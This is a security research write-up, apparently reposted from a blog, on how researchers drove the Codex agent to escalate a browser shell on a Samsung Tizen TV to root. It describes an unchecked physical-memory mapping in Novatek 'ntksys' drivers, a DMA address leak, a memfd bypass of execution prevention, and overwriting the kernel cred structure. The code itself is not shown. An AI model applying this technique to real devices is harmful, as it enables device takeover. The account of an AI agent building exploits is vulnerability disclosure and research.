not get code ex­e­cu­tion some­how” but turn browser-app code ex­e­cu­tion into root.“[2] Controller host: we had a sep­a­rate ma­chine that could build ARM bi­na­ries, host files over HTTP, and reach the shell ses­sion that was ac­tu­ally alive on the TV.[3] Shell lis­tener: the tar­get shell was dri­ven through tmux send-keys, which meant Codex had to in­ject com­mands into an al­ready-run­ning shell and then re­cover the re­sults from logs in­stead of treat­ing the TV like a fresh in­ter­ac­tive ter­mi­nal.[4] Matching source re­lease: we had the KantS2 source tree for the cor­re­spond­ing firmware fam­ily, which let Codex au­dit Samsung’s own ker­nel-dri­ver code and then test those find­ings against the live de­vice.[5] Execution con­straints: the tar­get re­quired sta­tic ARMv7 bi­na­ries, and un­signed pro­grams could not sim­ply run from disk be­cause of Samsung Tizen’s Unauthorized Execution Prevention, or UEP.[6] memfd wrap­per: to work around UEP, we al­ready had a helper that loaded a pro­gram into an anony­mous in-mem­ory file de­scrip­tor and ex­e­cuted it from mem­ory in­stead of from a nor­mal file path.With that setup, Codex’s loop was sim­ple: in­spect the source and ses­sion logs, send com­mands into the TV through the con­troller and the tmux-dri­ven shell, read the re­sults back from logs, and, when a helper was needed, build it on the con­troller, have the TV fetch it, and run it through memfd. A few short prompts made that op­er­at­ing loop ex­plicit:SSH to @. This is the shell lis­tener.Use … wget … use the IP of the server.The goal … is to find a vul­ner­a­bil­ity in this TV to es­ca­late priv­i­lege to root.It is ei­ther by de­vice dri­ver or pub­licly known vul­ner­a­bil­i­ties …We set the des­ti­na­tion and left the route open. We did not point Codex at a dri­ver, sug­gest phys­i­cal mem­ory, or men­tion ker­nel cre­den­tials, so it had to treat the ses­sion as a real priv­i­lege-es­ca­la­tion hunt rather than a con­fir­ma­tion ex­er­cise.The sec­ond prompt nar­rowed the stan­dard:… cross check the source to all vul­ner­a­bil­i­ties from that day on­wards …Make sure to THOROUGHLY check if a vul­ner­a­bil­ity ac­tu­ally still ex­ists …reachability (must be reach­able as the browser user con­text).Make sure to check for the ac­tual avail­abil­ity of the at­tack sur­face in the live sys­tem …We raised the bar: the bug had to ex­ist in the source, be pre­sent on the de­vice, and be reach­able from the browser shell. Codex’s out­put quickly nar­rowed into con­crete can­di­dates.We then gave Codex the facts that would an­chor the rest of the ses­sion:That bun­dle did most of the fram­ing work. The browser iden­tity de­fined the priv­i­lege bound­ary and later be­came part of the sig­na­ture Codex used to rec­og­nize the browser process’s ker­nel cre­den­tials in mem­ory. The ker­nel ver­sion nar­rowed the code­base, the de­vice nodes de­fined the reach­able in­ter­faces, and /p​roc/cmdline later sup­plied the mem­ory-lay­out hints for phys­i­cal scan­ning.Codex quickly ze­roed in on a set of world-writable ntk* de­vice nodes ex­posed to the browser shell:Codex fo­cused on that dri­ver fam­ily be­cause it was loaded on the de­vice, reach­able from the browser shell, and pre­sent in the re­leased source tree. Reading the match­ing ntk­driver sources is also where the Novatek link be­came clear: the tree is stamped through­out with Novatek Microelectronics iden­ti­fiers, so these ntk* in­ter­faces were not just opaque de­vice names on the TV, but part of the Novatek stack Samsung had shipped. That gave the ses­sion a con­crete di­rec­tion.At one point we had to give Codex a con­straint that could eas­ily have de­railed the ses­sion:/​proc/​iomem is one of the nor­mal places to rea­son about phys­i­cal mem­ory lay­out, so los­ing it mat­tered. Codex re­sponded by piv­ot­ing to an­other source of truth - /p​roc/cmdline:Those boot pa­ra­me­ters were enough to re­con­struct the main RAM win­dows for the later scan.With the field nar­rowed to ntksys and ntkhdma, Codex au­dited the match­ing KantS2 source and found the prim­i­tive that made the rest of the ses­sion pos­si­ble./​dev/​ntksys was a Samsung ker­nel-dri­ver in­ter­face that ac­cepted a phys­i­cal ad­dress and a size from user space, stored those val­ues in a table, and then mapped that phys­i­cal mem­ory back into the caller’s ad­dress space through mmap. That is what we mean here by a physmap prim­i­tive: a path that gives user space ac­cess to raw phys­i­cal mem­ory. The op­er­a­tional con­se­quence was straight­for­ward. If the browser shell could use ntksys this way, Codex would not need a ker­nel code-ex­e­cu­tion trick. It would only need a re­li­able ker­nel data struc­ture to over­write.From there, the path was no longer a ker­nel con­trol-flow ex­ploit, but a data-only es­ca­la­tion built on phys­i­cal-mem­ory ac­cess.This is al­ready a se­ri­ous de­sign er­ror be­cause ntksys is not a be­nign meta­data in­ter­face. It is a mem­ory-man­age­ment in­ter­face.The dri­ver in­ter­face is built around ST_SYS_MEM_INFO:u32Start and u32­Size come di­rectly from user space. Those are the only two val­ues an at­tacker needs to turn this in­ter­face into a raw physmap.SET_MEM_INFO val­i­dates the slot, not the phys­i­cal rangeThe crit­i­cal write path is in ker_sys.c around line 1158:The dri­ver checks whether the table in­dex is valid. It does not check whether the re­quested phys­i­cal range be­longs to a ker­nel-owned buffer, whether it over­laps RAM, whether it crosses priv­i­leged re­gions, or whether the caller should be al­lowed to map it at all.The cor­re­spond­ing map path is in ker_sys.c around line 1539:vma->vm_pgoff se­lects the slot, and the slot con­tents are at­tacker-con­trolled. The dri­ver then passes the user-cho­sen PFN di­rectly to vk_remap_pfn_range. At that point the ker­nel is no longer en­forc­ing priv­i­lege sep­a­ra­tion for phys­i­cal mem­ory.This is not the core priv­i­lege-es­ca­la­tion bug, but it is use­ful op­er­a­tionally. It hands un­priv­i­leged code a known-good phys­i­cal ad­dress that can be mapped through ntksys to prove the prim­i­tive works be­fore touch­ing ar­bi­trary RAM.Codex did not jump di­rectly from source au­dit to fi­nal ex­ploita­tion. It built a proof chain in stages.First it wrote a small helper to talk to /dev/ntkhdma and ask for the phys­i­cal ad­dress of the de­vice’s DMA (direct mem­ory ac­cess) buffer. A DMA buffer is mem­ory the dri­ver uses for di­rect hard­ware ac­cess, and the key point here was not DMA it­self but the fact that the dri­ver was will­ing to hand an un­priv­i­leged process a real phys­i­cal ad­dress. The first pre­served suc­cess looked like this:That gave Codex a safe, known-good phys­i­cal page to test against. It then wrote a sec­ond helper to an­swer the more dan­ger­ous ques­tion: if it reg­is­tered that phys­i­cal ad­dress through ntksys, could it re­ally map the page into user space and read or write it from the browser shell? The an­swer was yes:Be­fore that out­put, the is­sue was still a source-backed the­ory; af­ter it, Codex had shown that an un­priv­i­leged process on the TV could read and write a cho­sen phys­i­cal page. The re­main­ing ques­tion was which ker­nel ob­ject to cor­rupt.The ex­ploit did not come from us. We never told Codex to patch cred, never ex­plained what cred was, and never pointed out that the browser process’s uid=5001 and gid=100 would make a rec­og­niz­able pat­tern in mem­ory.That choice fol­lowed di­rectly from the prim­i­tive it had al­ready proven.For any­one who does not spend time in Linux in­ter­nals, cred is the ker­nel struc­ture that stores a process’s iden­ti­ties: user ID, group ID, and re­lated cre­den­tial fields. If you can over­write the right cred, you can change who the ker­nel thinks the process is. Once Codex had ar­bi­trary phys­i­cal-mem­ory ac­cess, the re­main­ing plan be­came straight­for­ward: scan the RAM win­dows re­cov­ered from /p​roc/cmdline, look for the browser process’s cre­den­tial pat­tern, zero the iden­tity fields, and then launch a shell.The live shell had given Codex the iden­tity val­ues, the source au­dit had given it the prim­i­tive, the early helpers had proven that prim­i­tive, and the fi­nal ex­ploit con­nected those pieces with­out need­ing any elab­o­rate ker­nel con­trol-flow trick.By the time we reached the fi­nal run, the hard parts were al­ready in place. We had the sur­face, the prim­i­tive, the de­ploy­ment path, and the ex­ploit. The last hu­man prompt was:yeah okay try to check if it worksCodex pushed the fi­nal chain through the con­troller path, had the TV fetch it, ran it through the in-mem­ory wrap­per, and waited for the re­sult. The out­put was:By that point, the chain had al­ready gone through sur­face se­lec­tion, source au­dit, live val­i­da­tion, PoC de­vel­op­ment, tar­get-spe­cific build han­dling, re­mote de­ploy­ment, ex­e­cu­tion un­der memfd, it­er­a­tive de­bug­ging, and fi­nally the cre­den­tial over­write that turned the browser shell into root.In the course of dri­ving Codex to the fi­nal des­ti­na­tion, it def­i­nitely was about to go off-track if we did not steer it back im­me­di­ately. Here are some of those real in­ter­ac­tions:bro, when you over­write the args count, would­n’t the loop just go wild?bro can you just like, send it to the server, build it, and use the tmux shell to pull it down and run it for me? Why *** do you tell me to do *** bro, that’s your job­bro. the is not the TV, it is where the shell lives­bro. what *** you did man? the tv froze­Bro what did you do be­fore you just repli­cate it now? why so hard?Hon­estly, this makes it even more re­al­is­tic than we thought. At times, it was a one-shot suc­cess, and at other times, you re­ally need to build that real in­ter­ac­tion with Codex. This could­n’t have com­pleted if we were treat­ing it like a soul­less bug find­ing and ex­ploit de­vel­op­ing ma­chine!What made the ses­sion worth doc­u­ment­ing was the shape of the loop it­self. We set up a con­trol path into a com­pro­mised TV, gave it the match­ing source tree and a way to build and stage code, and from there the work be­came a re­peated cy­cle of in­spec­tion, test­ing, ad­just­ment, and re­run un­til the browser foothold turned into root on the de­vice.This ex­per­i­ment is part of a larger ex­er­cise. The browser shell was­n’t mag­i­cally ob­tained by Codex. We had al­ready ex­ploited the de­vice to get that ini­tial foothold. The goal here was nar­rower: given a re­al­is­tic post-ex­ploita­tion po­si­tion, could AI take it all the way to root?The next step is ob­vi­ous (and slightly con­cern­ing): let the AI do the whole thing end-to-end. Hopefully it’ll stay trapped in­side the TV for­ever, qui­etly es­ca­lat­ing priv­i­leges and watch­ing our sit­coms.

...

Read the original on blog.calif.io »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.